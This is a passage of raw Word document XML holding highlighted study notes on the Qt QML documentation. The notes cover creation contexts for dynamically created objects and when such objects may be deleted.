          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createQmlObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, explicitly contain all necessary imports at the top of the file in addition to inside the string literals.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is static qml application?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="00D815C8" w:rsidRDefault="0004794A" w:rsidP="00250096">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc483000556"/>
      <w:bookmarkStart w:id="138" w:name="_Toc483003577"/>
      <w:bookmarkStart w:id="139" w:name="_Toc483603913"/>
      <w:bookmarkStart w:id="140" w:name="_Toc483605133"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maintaining Dynamically Created Objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="0004794A"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When managing dynamically created objects, you must ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the creation context outlives the created object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Otherwise, if the creation context is destroyed first, the bindings in the dynamic object will no longer work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="00D815C8" w:rsidRDefault="0004794A" w:rsidP="0004794A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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The actual </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creation context depends on how an object is created</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="00250096" w:rsidRDefault="0004794A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createComponent()</w:t>
        </w:r>
      </w:hyperlink>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is used, the creation context is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidRPr="006F4DE5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in which this method is called</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="00D815C8" w:rsidRDefault="0004794A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createQmlObject()</w:t>
        </w:r>
      </w:hyperlink>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 xml:space="preserve">is called, the creation context is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>context of the parent object passed to this method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="006F4DE5" w:rsidRDefault="0004794A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If a</w:t>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component{}</w:t>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object is defined an</w:t>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="006F4DE5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>createObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:anchor="incubateObject-method" w:history="1">
        <w:r w:rsidRPr="006F4DE5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>incubateObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called on that object, the creation context is the context in which the</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is defined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004794A" w:rsidRPr="00D815C8" w:rsidRDefault="00E115BC"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Also, note that while </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamically created objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be used the same as other objects, they </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not have an id in QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E115BC" w:rsidRPr="00D815C8" w:rsidRDefault="00E115BC" w:rsidP="006F4DE5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc483000557"/>
      <w:bookmarkStart w:id="142" w:name="_Toc483003578"/>
      <w:bookmarkStart w:id="143" w:name="_Toc483603914"/>
      <w:bookmarkStart w:id="144" w:name="_Toc483605134"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deleting Objects Dynamically</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="00E115BC"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In many user interfaces, it is sufficient </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to set a visual object's opacity to 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to move the visual object off the screen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of deleting it. If you have lots of dynamically created objects, however, you may receive a worthwhile performance benefit if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unused objects are deleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="00DB3FC2"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Note that you should never manually delete objects that were dynamically created by convenience QML object factories (such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Repeater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>). Also, you should avoid deleting objects that you did not dynamically create yourself.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Don’t delete dynamically created objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4"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Items can be deleted using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
